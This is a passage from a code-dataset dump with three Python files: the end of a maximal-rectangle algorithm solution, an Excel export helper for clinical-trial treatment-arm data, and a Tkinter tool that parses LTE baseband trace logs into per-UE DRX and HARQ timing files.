typing import List\n\n\nclass Solution:\n # dp.\n # Height first: fix the tallest run of 1's ending at each row, then find the widest span that still supports that height; height * width bounds the rectangle through each cell.\n def maximalRectangle(self, matrix: List[List[str]]) -> int:\n m = len(matrix)\n if m == 0: return 0\n n = len(matrix[0])\n max_area = 0\n height = [0]*n\n left = [0]*n # left, right [l, r)\n right = [n]*n\n for i in range(m):\n curr_left, curr_right = 0, n\n # calculate the maximum height of the item so far\n for j in range(n):\n if matrix[i][j] == \"1\":\n height[j] += 1\n else:\n height[j] = 0\n for j in range(n):\n if matrix[i][j] == \"1\":\n left[j] = max(left[j], curr_left)\n else: # there's no left boundary, we just set it to zero\n # when multiplied with the height[i][j], which is zero, the area is zero\n left[j] = 0\n curr_left = j+1\n for j in range(n-1, -1, -1):\n if matrix[i][j] == \"1\":\n right[j] = min(right[j], curr_right)\n else: # there's no right boundary, we just set it to n\n # when multiplied with the height[i][j], which is zero, the area is zero\n right[j] = n\n curr_right = j\n # print(height, left, right)\n for j in range(n):\n max_area = max(max_area, height[j] * (right[j]-left[j]))\n \n return max_area\n\n","sub_path":"85.maximal-rectangle.py","file_name":"85.maximal-rectangle.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"300799892","text":"import copy\nimport logging\n\nfrom helpers.excel_generator import ExcelGenerator\n\nARM_OVERVIEW_BOLD_COLUMNS = [1, 3, 5, 7]\nARM_OVERVIEW_HEADING = \"ARM Data\"\n\nNONSTANDARD_PARSERS = {\n \"EAY131-A\": \"Eay131a\",\n \"EAY131-I\": \"Eay131i\",\n \"EAY131-IX1\": \"Eay131i\",\n \"EAY131-J\": \"Eay131j\",\n \"EAY131-K1\": \"Eay131k1\",\n \"EAY131-K2\": \"Eay131k2\",\n \"EAY131-L\": \"Eay131l\",\n \"EAY131-M\": \"Eay131m\",\n \"EAY131-N\": \"Eay131n\",\n \"EAY131-P\": \"Eay131p\",\n \"EAY131-Y\": \"Eay131y\",\n \"EAY131-Z1C\": \"Eay131z1c\",\n \"EAY131-Z1E\": \"Eay131z1e\",\n \"EAY131-Z1F\": \"Eay131z1f\",\n \"EAY131-Z1G\": \"Eay131z1g\",\n \"EAY131-Z1H\": \"Eay131z1h\",\n \"EAY131-Z1I\": \"Eay131z1i\",\n}\n\nDISEASE_EXCLUSION_HEADING = \"Histologic Disease Exclusion Codes\"\nDISEASE_EXCLUSION_MAP = [\n ('CTEP CATEGORY', 'ctepCategory'),\n ('CTEP SUB-CATEGORY', 'ctepSubCategory'),\n ('CTEP TERM', 'ctepTerm'),\n ('SHORT NAME', 'shortName'),\n ('MEDDRA CODE', '_id'),\n]\nDISEASE_EXCL_COLUMN_NAMES = 
[map_item[0] for map_item in DISEASE_EXCLUSION_MAP]\nDISEASE_EXCL_FIELD_NAMES = [map_item[1] for map_item in DISEASE_EXCLUSION_MAP]\nDISEASE_EXCLUSION_SOURCE = 'exclusionDiseases'\n\nPRIOR_THERAPY_HEADING = \"Prior Therapy (Drug Exclusion)\"\nPRIOR_THERAPY_MAP = [\n ('Drug ID', 'drugId'),\n ('Drug Name', 'name'),\n ('Drug ID 2', 'drugId2'),\n ('Drug Name', 'name2'),\n ('Description (Free form text)', 'description'),\n ('Class (agreed upon list)', 'drugClass'),\n ('Pathway (agreed upon list)', 'pathway'),\n ('Target Gene (agreed upon list)', 'target'),\n]\nPRIOR_THERAPY_COLUMN_NAMES = [map_item[0] for map_item in PRIOR_THERAPY_MAP]\nPRIOR_THERAPY_FIELD_NAMES = [map_item[1] for map_item in PRIOR_THERAPY_MAP]\nPRIOR_THERAPY_SOURCE = 'exclusionDrugs'\n\nIHC_RESULTS_HEADING = \"IHC Results\"\nIHC_RESULTS_MAP = [\n ('Gene', 'gene'),\n ('Status (POSITIVE, NEGATIVE, INDETERMINATE)', 'assayResultStatus'),\n ('Variant (PRESENT, NEGATIVE, EMPTY)', 'assayVariant'),\n ('Description', 'description'),\n ('LOE', 'levelOfEvidence'),\n]\nIHC_RESULTS_COLUMN_NAMES = [map_item[0] for map_item in IHC_RESULTS_MAP]\nIHC_RESULTS_FIELD_NAMES = [map_item[1] for map_item in IHC_RESULTS_MAP]\nIHC_RESULTS_SOURCE = 'assayResults'\n\nINCL_NONHOTSPOT_RULES_HEADING = \"Inclusion Non-Hotspot Rules\"\nEXCL_NONHOTSPOT_RULES_HEADING = \"Exclusion Non-Hotspot Rules\"\nNONHOTSPOT_RULES_MAP = [\n ('Description', 'description'),\n ('Oncomine Variant Class', 'oncominevariantclass'),\n ('Gene Name', 'gene'),\n ('Exon', 'exon'),\n ('Function', 'function'),\n ('Level of Evidence', 'levelOfEvidence'),\n ('Literature Reference (Pubmed ID)', lambda var: \", \".join(var.get(\"publicMedIds\", []))), # is a list\n ('Special Rules', lambda var: \"TRUE\" if var.get('armSpecific', False) else \"\"),\n]\nNONHOTSPOT_RULES_COLUMN_NAMES = [map_item[0] for map_item in NONHOTSPOT_RULES_MAP]\nNONHOTSPOT_RULES_FIELD_NAMES = [map_item[1] for map_item in NONHOTSPOT_RULES_MAP]\n\nINCL_VARIANTS_HEADING = \"Inclusion Variants\"\nEXCL_VARIANTS_HEADING = \"Exclusion Variants\"\nVARIANTS_MAP = [\n ('Gene Name', 'geneName'),\n ('Variant ID', 'identifier'),\n ('Variant Type', 'type'),\n ('Variant Description', 'description'),\n ('Level of Evidence Code', 'levelOfEvidence'),\n ('Protein', 'protein'),\n ('Chromosome', 'chromosome'),\n ('Position', 'position'),\n ('Alt', 'alternative'),\n ('Ref', 'reference'),\n ('Literature Reference', lambda var: \", \".join(var.get(\"publicMedIds\", []))), # is a list\n ('Variant Source', lambda var: var.get(\"metadata\", {}).get(\"variantSource\", \"Subprotocol\")),\n ('Copy Number Threshold', lambda var: var.get(\"metadata\", {}).get(\"copyNumberThreshold\", \"\")),\n ('Special Rules', lambda var: \"TRUE\" if var.get('armSpecific', False) else \"\"),\n]\nVARIANTS_COLUMN_NAMES = [map_item[0] for map_item in VARIANTS_MAP]\nVARIANTS_FIELD_NAMES = [map_item[1] for map_item in VARIANTS_MAP]\n\n\ndef generate_treatment_arm_excel_file(treatment_arm_data):\n logging.debug(\"Generating Excel File for Treatment Arm {}\".format(treatment_arm_data['treatmentArmId']))\n\n eg = ExcelGenerator(treatment_arm_data['treatmentArmId'])\n\n add_sections_to_workbook(eg, treatment_arm_data)\n\n # returns the bytes to save as an Excel file\n return eg.get_workbook_data()\n\n\ndef add_sections_to_workbook(eg, treatment_arm_data):\n add_arm_overview_data(eg, treatment_arm_data)\n add_disease_exclusion_data(eg, treatment_arm_data)\n add_prior_therapy_data(eg, treatment_arm_data)\n add_ihc_results_data(eg, treatment_arm_data)\n 
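# NOTE (illustrative sketch, not part of the original module): each section added here is driven by a list of (COLUMN_NAME, field) pairs, where a field is either a dict key or a callable; extract_data() below resolves both cases. A minimal standalone version of the pattern:\n #     MAP = [('Gene', 'gene'), ('Refs', lambda v: ', '.join(v.get('publicMedIds', [])))]\n #     def rows_for(objects):\n #         return [[f(o) if callable(f) else o.get(f, '') for _, f in MAP] for o in objects]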
add_variant_report_data(eg, treatment_arm_data)\n\n\ndef add_ihc_results_data(eg, treatment_arm_data):\n ihc_results_data = extract_data(treatment_arm_data, IHC_RESULTS_SOURCE, IHC_RESULTS_FIELD_NAMES)\n eg.add_section(ihc_results_data, column_names=IHC_RESULTS_COLUMN_NAMES,\n section_heading=IHC_RESULTS_HEADING, skip_rows=1)\n\n\ndef create_prior_therapy_data(exclusion_drug_data):\n drug_list = exclusion_drug_data.get('drugs', [])\n prior_therapy_data = copy.copy(drug_list[0]) if drug_list else {}\n if len(drug_list) > 1:\n prior_therapy_data['drugId2'] = drug_list[1].get('drugId', \"\")\n prior_therapy_data['name2'] = drug_list[1].get('name', \"\")\n return prior_therapy_data\n\n\ndef add_prior_therapy_data(eg, treatment_arm_data):\n prior_therapy_data = extract_data(treatment_arm_data, PRIOR_THERAPY_SOURCE, PRIOR_THERAPY_FIELD_NAMES,\n field_preprocessor=create_prior_therapy_data)\n eg.add_section(prior_therapy_data, column_names=PRIOR_THERAPY_COLUMN_NAMES,\n section_heading=PRIOR_THERAPY_HEADING, skip_rows=1)\n\n\ndef add_disease_exclusion_data(eg, treatment_arm_data):\n disease_exclusion_data = extract_data(treatment_arm_data, DISEASE_EXCLUSION_SOURCE, DISEASE_EXCL_FIELD_NAMES)\n eg.add_section(disease_exclusion_data, column_names=DISEASE_EXCL_COLUMN_NAMES,\n section_heading=DISEASE_EXCLUSION_HEADING, skip_rows=1)\n\n\ndef add_arm_overview_data(eg, treatment_arm_data):\n overview_data = extract_arm_overview_data(treatment_arm_data)\n eg.add_section(overview_data, bold_columns=ARM_OVERVIEW_BOLD_COLUMNS, section_heading=ARM_OVERVIEW_HEADING)\n\n\ndef extract_arm_overview_data(treatment_arm_data):\n\n treatment_arm_drug = treatment_arm_data.get(\"treatmentArmDrugs\", [{}])[0]\n treatment_arm_id = treatment_arm_data.get(\"treatmentArmId\", \"ARM ID MISSING!\")\n row1 = [\n \"Official Name\", treatment_arm_data.get(\"name\", \"ARM NAME MISSING!\"),\n \"ARM Id\", treatment_arm_id,\n \"ARM Drug\", treatment_arm_drug.get(\"name\", \"DRUG NAME MISSING!\"),\n \"Version\", treatment_arm_data.get(\"version\", \"VERSION MISSING!\"),\n ]\n row2 = [\n \"ARM Pathway Id\", \"\",\n \"ARM Pathway Name\", treatment_arm_drug.get(\"pathway\", \"\"),\n \"ARM Drug Id\", treatment_arm_drug.get(\"drugId\", \"DRUG ID MISSING!\"),\n \"Study Types\", ', '.join(treatment_arm_data.get(\"studyTypes\", [\"STUDY TYPES MISSING!\"])),\n ]\n row3 = [\n \"ARM Gene\", treatment_arm_data.get(\"gene\", \"\"),\n \"ARM Description\", treatment_arm_data.get(\"description\", \"ARM DESCRIPTION MISSING!\"),\n \"ARM Parser\", NONSTANDARD_PARSERS.get(treatment_arm_id, \"StandardParser\")\n ]\n return [row1, row2, row3]\n\n\ndef extract_data(treatment_arm_data, source, field_names, field_preprocessor=None):\n def get_field(var, field):\n if callable(field):\n return field(var)\n else:\n field_data = var.get(field, \"\")\n return field_data\n\n rows = []\n for field_object in treatment_arm_data.get(source, []):\n if field_preprocessor is not None: # sometimes the data needs a little massaging first\n field_object = field_preprocessor(field_object)\n\n row = [get_field(field_object, field_name) if field_name is not None else \"\" for field_name in field_names]\n rows.append(row)\n return rows\n\n\ndef extract_variant_report_data(treatment_arm_data):\n variant_report = treatment_arm_data['variantReport']\n\n excl_nhs_rules_data, incl_nhs_rules_data = extract_nonhotspot_rules_data(variant_report)\n\n excl_variants_data, incl_variants_data = extract_variants_data(variant_report)\n\n variant_report_data = {\n 'incl_nonhotspot_rules': 
incl_nhs_rules_data,\n 'excl_nonhotspot_rules': excl_nhs_rules_data,\n 'incl_variants': incl_variants_data,\n 'excl_variants': excl_variants_data,\n }\n\n return variant_report_data\n\n\ndef extract_variants_data(variant_report):\n\n snv_variants = [dict(**var, **{'type': 'SNV'}) for var in variant_report['singleNucleotideVariants']]\n cnv_variants = [dict(**var, **{'type': 'CNV'}) for var in variant_report['copyNumberVariants']]\n indel_variants = [dict(**var, **{'type': 'Indel'}) for var in variant_report['indels']]\n gf_variants = [dict(**var, **{'type': 'Fusion'}) for var in variant_report['geneFusions']]\n\n all_variants = snv_variants + cnv_variants + indel_variants + gf_variants\n\n excl_variants = [var for var in all_variants if not var.get('inclusion', True)]\n incl_variants = [var for var in all_variants if var.get('inclusion', True)]\n\n excl_variants_data = extract_data({'data': excl_variants}, 'data', VARIANTS_FIELD_NAMES)\n incl_variants_data = extract_data({'data': incl_variants}, 'data', VARIANTS_FIELD_NAMES)\n\n return excl_variants_data, incl_variants_data\n\n\ndef extract_nonhotspot_rules_data(variant_report):\n nonhotspot_rules = variant_report['nonHotspotRules']\n\n excl_nonhotspot_rules = [nhr for nhr in nonhotspot_rules if not nhr.get('inclusion', True)]\n incl_nonhotspot_rules = [nhr for nhr in nonhotspot_rules if nhr.get('inclusion', True)]\n\n excl_nhs_rules_data = extract_data({'data': excl_nonhotspot_rules}, 'data', NONHOTSPOT_RULES_FIELD_NAMES)\n incl_nhs_rules_data = extract_data({'data': incl_nonhotspot_rules}, 'data', NONHOTSPOT_RULES_FIELD_NAMES)\n\n return excl_nhs_rules_data, incl_nhs_rules_data\n\n\ndef add_variant_report_data(eg, treatment_arm_data):\n variant_report_data = extract_variant_report_data(treatment_arm_data)\n eg.add_section(variant_report_data['excl_nonhotspot_rules'], column_names=NONHOTSPOT_RULES_COLUMN_NAMES,\n section_heading=EXCL_NONHOTSPOT_RULES_HEADING, skip_rows=1)\n eg.add_section(variant_report_data['incl_nonhotspot_rules'], column_names=NONHOTSPOT_RULES_COLUMN_NAMES,\n section_heading=INCL_NONHOTSPOT_RULES_HEADING, skip_rows=1)\n eg.add_section(variant_report_data['excl_variants'], column_names=VARIANTS_COLUMN_NAMES,\n section_heading=EXCL_VARIANTS_HEADING, skip_rows=1)\n eg.add_section(variant_report_data['incl_variants'], column_names=VARIANTS_COLUMN_NAMES,\n section_heading=INCL_VARIANTS_HEADING, skip_rows=1)\n","sub_path":"helpers/treatment_arm_download_generator.py","file_name":"treatment_arm_download_generator.py","file_ext":"py","file_size_in_byte":10787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"56787683","text":"#!/app/vbuild/RHEL6-x86_64/python/2.7.9/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport re\nimport math\nimport webbrowser\nimport sys\nimport os\nimport glob\nimport itertools\ntry:\n # for Python2\n from Tkinter import *\nexcept ImportError:\n # for Python3\n from tkinter import *\nfrom tkFileDialog import *\nimport tkMessageBox\n\nif os.path.isfile(sys.argv[1]):\n log_file = os.path.realpath(sys.argv[1])\nelse:\n log_file = raw_input('File entered does not exist. 
Please enter the correct path to a log file: ')\n\ntry:\n f = open(log_file, 'r')\nexcept IOError:\n print(\"Cannot open \" + log_file)\n sys.exit()\n\nues = []\n\nprint(\"Searching for all UEs from UPCDL.180 traces in the log file specified...\")\n\nfor line in f:\n if \"<!UPCDL.180!>\" in line:\n m = re.search(\"bbUeRef(=0x|=)([0-9,a-f]+)\", line)\n if m.group(2) not in ues:\n ues.append(m.group(2))\nf.close()\n\nmatches = []\n\ndef CurSelect(event):\n # CurSelect is used to return item selected from the Listbox\n global matches\n matches = [lb.get(idx) for idx in lb.curselection()]\n return matches\n\ndef close_window():\n root.destroy()\n\ndef stop():\n root.destroy()\n sys.exit()\n\ndef select_all():\n global matches\n global var\n global all_matches\n if var.get() == 1:\n all_matches = True\n lb.select_set(0, END)\n matches = [lb.get(idx) for idx in lb.curselection()]\n else:\n all_matches = False\n lb.select_clear(0, END)\n del matches[:]\n return matches\n\n\nroot = Tk()\nroot.title(\"DRX Tool\")\n\nins = Label(root, text=\"Please select the UEs you would like to execute the drx tool on.\", font=(\"Times New Roman\", 14))\nins.pack(side=\"right\")\n\ngetBut = Button(root, text='Run', font=(\"Times New Roman\", 12), command = close_window)\ngetBut.pack(side=\"bottom\")\n\nvar = IntVar()\nc = Checkbutton(root, text=\"All UEs\", variable=var, command = select_all)\nc.pack(side=\"bottom\")\n\nsb = Scrollbar(root, orient=\"vertical\")\nsb.pack(side=LEFT, fill=Y)\n\ntitle = Label(root, text=\"UPCDL.180 UEs\", font=(\"Times New Roman\", 14, \"bold\"), relief=\"raise\", width=14)\ntitle.pack(anchor=\"w\")\n\nlb = Listbox(root, selectmode=MULTIPLE, width=26, yscrollcommand=sb.set)\n\nfor item in ues:\n lb.insert((ues.index(item))+1, item)\n\nlb.pack(fill=Y, side=LEFT)\nsb.config(command=lb.yview)\nlb.bind(\"<<ListboxSelect>>\", CurSelect)\n\nroot.protocol(\"WM_DELETE_WINDOW\", stop)\nroot.mainloop()\n\nif (len(matches) == 0) or (matches == None):\n root = Tk()\n root.withdraw()\n tkMessageBox.showinfo(\n \"Error\",\n \"No UEs selected.\"\n )\n sys.exit()\n\nFoldersExist = []\nfor match in matches:\n dirname = \".\" + os.sep + match + \"_\" + os.path.basename(log_file)\n if os.path.exists(dirname):\n root = Tk()\n root.withdraw()\n tkMessageBox.showinfo(\n \"Error\",\n \"DRX information regarding this UE(s) already exists under: \" + str(dirname)\n )\n root.update()\n FoldersExist.append(match)\n\nif len(FoldersExist) == len(matches):\n sys.exit()\n\nfor match in matches:\n if match in FoldersExist:\n print(\" Plot will not be updated for UE: \" + match + \". 
Files already exist under \" + dirname + \"\\n\")\n continue\n\n dirname = \".\" + os.sep + match + \"_\" + os.path.basename(log_file)\n f = open(log_file, 'r')\n os.makedirs(dirname)\n target = open(dirname + os.sep + match + \"_\" + os.path.basename(log_file) + \".log\", 'w')\n\n noOfTraceblocks = 0\n traceblock = []\n lastTime = 0\n storeTime = 0\n nrOfMatch = 0\n ues = []\n ue = 0\n bbUeRef_hex = int(match, 16)\n\n OrigSfnTimePrint = 0\n PrevOrigSfnTimePrint = 0\n sumValue = 0\n prevsumValue = 0\n inconsistency = 0\n timeDiff = 0\n prevTimeMs = 0\n prevSfnValue = 0\n prevline = None\n\n\n def checkTraceblock():\n global nrOfMatch\n global lastTime\n global storeTime\n myprint = 0\n\n global prevSfnValue\n global prevTimeMs\n global sumValue\n global prevsumValue\n global SfValue\n global OrigSfnTimePrint\n global PrevOrigSfnTimePrint\n global inconsistency\n global prevline\n\n\n for line in traceblock:\n m = re.search(\"[0-9]+:[0-9]+:([0-9]+.[0-9]+)\", line)\n m2 = re.search(\"sfn:([0-9]+)\", line)\n\n if (m and m2):\n TimeMs = float(m.group(1))\n SfnValue = int(m2.group(1))\n\n if SfnValue < prevSfnValue:\n sumValue += SfnValue\n else:\n sumValue += SfnValue - prevSfnValue\n\n if (TimeMs < prevTimeMs):\n timeDiff = 60 - math.fabs(TimeMs - prevTimeMs)\n else:\n timeDiff = math.fabs(TimeMs - prevTimeMs)\n\n if timeDiff >= 0.1:\n if (prevSfnValue != 0) and (prevTimeMs != 0):\n inconsistency = 1\n else:\n inconsistency = 0\n\n prevSfnValue = SfnValue\n\n if(inconsistency):\n target.write(\"TIME GAP > 10 MS\\n\")\n target.write(prevline)\n target.write(line)\n\n prevTimeMs = TimeMs\n prevsumValue = sumValue\n prevline = line\n\n m = re.search(\"^\\\\[[-: 0-9]+.([0-9]+)\\\\]\", line)\n if m:\n storeTime = m.group(1)\n\n # Check if this line includes the specific match\n if (match in line) or (str(bbUeRef_hex) in line):\n myprint = 1\n nrOfMatch+=1\n\n # Extract the UE references in the log\n m = re.search(\"sessionRef=([0-9,a-f]+),\", line) or re.search(\"bbUeRef=0x([0-9,a-f]+)\", line) or re.search(\"bbUeRef=([0-9,a-f]+)\", line)\n if m:\n if m.group(1) not in ues:\n ue = m.group(1).replace(\",\", \"\")\n ues.append(ue) # new ueref, add to array...\n\n # check also bbBearerRef and determine the bbUeRef\n m = re.search(\"bbBearerRef(\\\\s|=)([0-9]+) \", line)\n if m:\n p = int(m.group(2)) & 0xFFFFFFE0\n if(p == bbUeRef_hex): # compare against the numeric UE ref; match itself is the hex string\n line = line.rstrip()\n target.write(line + \"(bbUeRef=)\" + str(p))\n\n # Check if the current TraceBlock shall be included in the outputfile\n if myprint == 1:\n timediff = int(storeTime) - int(lastTime)\n timediff_mm = int(timediff/1000)\n lastTime = storeTime\n while timediff_mm >= 1:\n target.write(\"*\")\n timediff_mm-=1\n target.write(\"\\n\")\n target.write(\" \".join(traceblock))\n\n print(\"Running...\")\n for line in f:\n m = re.search(\"0x[0-9abcdef]+=\", line) or re.search(\"^\\\\[[-:. 
0-9]+\\]\", line)\n if m: # example \"0x5051e916=\"\"\n noOfTraceblocks+=1\n checkTraceblock()\n del traceblock[:]\n traceblock.append(line)\n else:\n traceblock.append(line)\n\n print (\"\\n********** General Information for UE: \" + match + \"********************************************************\\n\")\n print (\" Total number of Traceblocks: %s\\n\" % noOfTraceblocks)\n print (\" Matched TraceBlocks: %i\\n\" % nrOfMatch)\n\n f.close()\n target.close()\n\n'''***************************************************************************************************************************************************************************************************************************\n******************************************************************************************************************************************************************************************************************************\n******************************************************************************************************************************************************************************************************************************'''\n\nfor match in matches:\n if match in FoldersExist:\n continue\n\n dirname = \".\" + os.sep + match + \"_\" + os.path.basename(log_file)\n f = open(dirname + os.sep + match + \"_\" + os.path.basename(log_file) + \".log\", 'r')\n DRXDLFILE = open(dirname + os.sep + match + \"_drx_dl.txt\", 'w')\n DRXFILE = open(dirname + os.sep + match + \"_rx_event_ul.txt\", 'w')\n DRXULFILE = open(dirname + os.sep + match + \"_drx_ul.txt\", 'w')\n RXPOWERPUSCHFILE = open(dirname + os.sep + match + \"_rxpower_pusch.txt\", 'w')\n ULNEWTBSFILE = open(dirname + os.sep + match + \"_ultbs_new.txt\", 'w')\n ULRETXTBSFILE = open(dirname + os.sep + match + \"_ultbs_retx.txt\", 'w')\n DLNEWFILE = open(dirname + os.sep + match + \"_dl_new.txt\", 'w')\n DLRETXFILE = open(dirname + os.sep + match + \"_dl_retx.txt\", 'w')\n DLTBSFILE = open(dirname + os.sep + match + \"_dltbs.txt\", 'w')\n PUCCHSRFILE = open(dirname + os.sep + match + \"_sr.txt\", 'w')\n ULSINRFILE = open(dirname + os.sep + match + \"_ulsinr.txt\", 'w')\n ULHARQACKFILE = open(dirname + os.sep + match + \"_ulharqack.txt\", 'w')\n ULHARQNACKFILE = open(dirname + os.sep + match + \"_ulharqnack.txt\", 'w')\n DRXUPDATEFILE = open(dirname + os.sep + match + \"_drxupdateind.txt\", 'w')\n DRXDLSKIPONDURATION = open(dirname + os.sep + match + \"_drxdl_skip_onduration.txt\", 'w')\n TIMESTAMP = open(dirname + os.sep + match + \"_timestamp.txt\", 'w')\n NEWDRXCONFIGINDEX = open(dirname + os.sep + match + \"_new_drx_config_index.txt\", 'w')\n NEWDRXSTARTOFFSET = open(dirname + os.sep + match + \"_new_drx_start_offset.txt\", 'w')\n NEWLONGDRXCYCLE = open(dirname + os.sep + match + \"_new_long_drx_cycle.txt\", 'w')\n DC_DT = open(dirname + os.sep + match + \"_dc_dt.txt\", 'w')\n INCONSISTENCY = open(dirname + os.sep + match + \"_inconsistency.txt\", 'w')\n\n noOfTraceBlocks = 0\n begin = 0\n traceblock = []\n storeTime = 0\n i = 0\n wrapDelay = 0\n\n srReceived = 0\n oldState = 0\n inactivity = 4\n drxLongCycle = 0\n drxShortCycle = 0\n drxShortUl = 2\n oldStateUl = 0\n oldInactivity = None\n oldInactivityUl = None\n inactivityUl = 4\n\n drxShort = 2\n oldShortCycleTimer = 0\n dtx = 0\n\n currentTimeTmp = None\n currentTime = None\n\n dlAllocInd = 0\n firstTime = 1\n newTti = 0\n missedTti = 0\n firstTti = 0\n lastTti = 0\n\n onType = 0\n\n dlDrxTraceAvailable = 0\n ulDrxTraceAvailable = 0\n\n ulMacCtrlInfo = None\n ulMeas2Ul = None\n ulAllocInd = 
None\n dlAllocInd = None\n\n validSample = None\n\n bfnTimePrint = None\n sfnTimePrint = None\n prevsfnTimePrint = None\n sfn = 0\n\n currentSfn = 0\n prevSfn = 0\n sumSfn = 0\n firstSfn = 1\n firstSfnValue = 0\n sfnWrap = 0\n\n prevTimeMs = 0\n prevSfnValue = 0\n\n OrigSfnTimePrint = 0\n PrevOrigSfnTimePrint = 0\n\n sumValue = 0\n prevsumValue = 0\n inconsistency = None\n timeDiff = 0\n\n prevline = ''\n\n TimeFinal = None\n TimeInit = None\n\n TimeGap = 0\n\n def timestamps2ms(timestamp):\n global currentTime\n global currentTimeTmp\n numbers = [0.1, 15, 61440]\n m = re.search(\"0x([\\dA-Fa-f]{3})([\\dA-Fa-f]{2})([\\dA-Fa-f]{3})\", timestamp)\n if m:\n t = [int(m.group(1), 16), int(m.group(2), 16), int(m.group(3), 16)]\n currentTimeTmp = 0.0\n for i in xrange(0, len(t)):\n currentTimeTmp += (t[i] / numbers[i])\n\n currentTime = int(currentTimeTmp)\n\n def getInfo(line):\n global TimeMs\n global sfnTimePrint\n global sfnWrap\n global firstSfn\n global sumSfn\n global prevSfn\n global firstSfnValue\n global currentSfn\n\n m = re.search(\"sfn:([0-9]+)\", line)\n m2 = re.search(\"sf:([0-9])\", line)\n m3 = re.search(\"[0-9]+:[0-9]+:([0-9]+.[0-9]+)\", line)\n\n currentSfn = int(m.group(1))\n sf = int(m2.group(1))\n TimeMs = float(m3.group(1))\n\n if firstSfn:\n firstSfn = 0\n firstSfnValue = currentSfn\n\n if currentSfn < prevSfn:\n sumSfn += currentSfn\n else:\n sumSfn += currentSfn - prevSfn\n\n sfnTimePrint = str(sumSfn) + str(sf)\n sfnWrap = int((sumSfn - currentSfn - firstSfnValue) / 1024)\n\n def gapDifference(line):\n global sfnTimePrint\n global prevsfnTimePrint\n global prevSfn\n global TimeMs\n global prevTimeMs\n global inconsistency\n\n if (TimeMs < prevTimeMs):\n timeDiff = 60 - math.fabs(TimeMs - prevTimeMs)\n else:\n timeDiff = math.fabs(TimeMs - prevTimeMs)\n\n if timeDiff >= 0.1:\n if (prevSfn is not 0) and (prevTimeMs is not 0):\n inconsistency = 1\n else:\n inconsistency = 0\n\n if(inconsistency):\n INCONSISTENCY.write(str(prevsfnTimePrint) + \" \" + str(timeDiff) + \"\\n\")\n INCONSISTENCY.write(str(sfnTimePrint) + \" \" + str(timeDiff) + \"\\n\")\n\n def checkTraceblock():\n global wrapDelay\n global storeTime\n global i\n global newTti\n global missedTti\n global firstTti\n global lastTti\n global ulMacCtrlInfo\n global ulMeas2Ul\n global ulAllocInd\n global dlAllocInd\n global validSample\n global oldState\n global drxShort\n global inactivity\n global dtx\n global oldInactivity\n global drxLongCycle\n global drxShortCycle\n global srReceived\n global oldShortCycleTimer\n global dlDrxTraceAvailable\n global ulDrxTraceAvailable\n global drxShortUl\n global oldStateUl\n global inactivityUl\n global firstTime\n global onType\n global bfnTimePrint\n global oldInactivityUl\n global UlL1Harqfdbk\n global dlHarqValid\n global TimeGap\n global prevline\n global startTimeGap\n global TimeInit\n global TimeFinal\n global prevSfn\n global prevsfnTimePrint\n global prevTimeMs\n global ALL\n global OFF\n\n tbsDl = 0\n tbsUl = 0\n ulRetx = 0\n ulNewTx = 0\n\n ############\n dlAllocInd = 0\n ulAllocInd = 0\n ulMacCtrlInfo = 0\n ulMeas2Ul = 0\n ulMeas2Ul = 0\n validSample = 0\n UlL1Harqfdbk = 0\n dlHarqValid = 0\n ############\n\n # Check each line in the TraceBlock for matching parts.\n for line in traceblock:\n\n #############################################################################\n # Extract SFN, SF, and Time stamp\n #############################################################################\n\n m = re.search(\"^\\[[-:. 
0-9]+\\]\", line)\n if m:\n getInfo(line)\n\n #############################################################################\n # Extract Time Gap\n #############################################################################\n\n m = re.search(r'\\bTIME GAP > 10 MS\\b', line)\n if m:\n TimeGap = 1\n TimeInit = None\n TimeFinal = None\n\n elif((TimeGap) and (TimeInit is None)):\n TimeInit = TimeMs\n\n elif((TimeGap) and (TimeFinal is None) and (TimeInit is not None)):\n gapDifference(line)\n TimeGap = 0\n\n prevline = line\n prevSfn = currentSfn\n prevsfnTimePrint = sfnTimePrint\n prevTimeMs = TimeMs\n\n #############################################################################\n # Extract BFN\n #############################################################################\n\n m = re.search(\"(0x[0-9abcdef]+)=.*\", line)\n if m:\n timestamps2ms(m.group(1))\n\n # Handle Time wrap\n if ((wrapDelay == 0) and (storeTime > (currentTime + 3000))):\n i+=1\n wrapDelay = 100\n storeTime = currentTime\n\n # handling a wrap window, due to traces not always sorted in time. Will not update store until after the window.\n if(wrapDelay > 0):\n wrapDelay-=1\n else:\n storeTime = currentTime;\n\n # remove 40960 if \"old bfn\" turn up in the logfile\n if ((i > 0) and (storeTime > (storeTime + 2000))):\n bfnTimePrint = currentTime + (40960*(i - 1))\n print (\"removing 40960 from bfn time: \" + str(bfnTimePrint) + \"\\n\")\n else:\n bfnTimePrint = currentTime + (40960*i)\n\n #############################################################################\n # TTI (transmission time interval) print\n #############################################################################\n\n if bfnTimePrint > newTti:\n if bfnTimePrint > (newTti + 1):\n missedTti+=1\n newTti = bfnTimePrint\n\n if firstTti == 0:\n firstTti = bfnTimePrint\n lastTti = bfnTimePrint\n\n m = re.search(\"(\\d+-\\d+-\\d+)\", line)\n m2 = re.search(\"([0-9]+:[0-9]+:[0-9]+.[0-9]+)\", line)\n m3 = re.search(\"sfn:([0-9]+)\", line)\n m4 = re.search(\"sf:([0-9]+).([0-9]+)\", line)\n if m:\n date = m.group(1)\n timestamp = m2.group(1)\n sfnvalue = int(m3.group(1))\n sfvalue = str(m4.group(1)) + \".\" + str(m4.group(2))\n #TIMESTAMP.write(str(sfnTimePrint) + \" \" + str(date) + \"_\" + str(timestamp) + \"_\" + str(sfnvalue) + \"_\" + str(sfvalue) + \"\\n\")\n TIMESTAMP.write(str(sfnTimePrint) + \" \" + str(date) + \" \" + str(timestamp) + \"\\n\")\n\n #############################################################################\n # Get UL HARQ Info\n #############################################################################\n\n m = re.search(\"UpUlMacPeCiUlMacCtrlInfoIndS?\", line)\n if m:\n ulMacCtrlInfo = 1\n\n m = re.search(\".*HarqFeedbackAck.*\", line) #NOT FOUND IN LOGS\n if ((ulMacCtrlInfo == 1) and (m)):\n ULHARQACKFILE.write(str(sfnTimePrint) + \" 1.5\\n\")\n if(firstTime):\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 0.5\\n\")\n firstTime = 0\n\n m = re.search(\".*HarqFeedbackNack.*\", line) #NOT FOUND IN LOGS\n if ((ulMacCtrlInfo == 1) and (m)):\n ULHARQNACKFILE.write(str(sfnTimePrint) + \" 